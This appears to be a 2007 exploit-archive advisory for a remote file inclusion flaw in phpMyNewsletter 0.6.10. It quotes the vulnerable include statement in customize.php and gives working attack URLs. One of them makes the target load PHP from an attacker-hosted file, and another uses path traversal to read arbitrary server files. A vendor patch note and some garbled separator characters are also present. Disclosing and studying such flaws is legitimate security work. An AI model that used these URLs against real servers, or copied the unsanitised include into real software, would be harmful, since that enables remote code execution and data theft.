[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability
# Published : 2007-04-04
# Author : frog-m@n
# Previous Title : WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
# Next Title : AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã
---- /include/customize.php ----
<?
$langfile = $l;
include $l;
?>
---- /include/customize.php ----
Exploit :
?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>
or
http://[target]/include/customize.php?l=../path/file/to/view
Patch :
?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã?¡ã
Autor has been alerted and last version (0.7beta1) has been patched.
More details
- in french :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
# www.Syue.com [2007-04-04]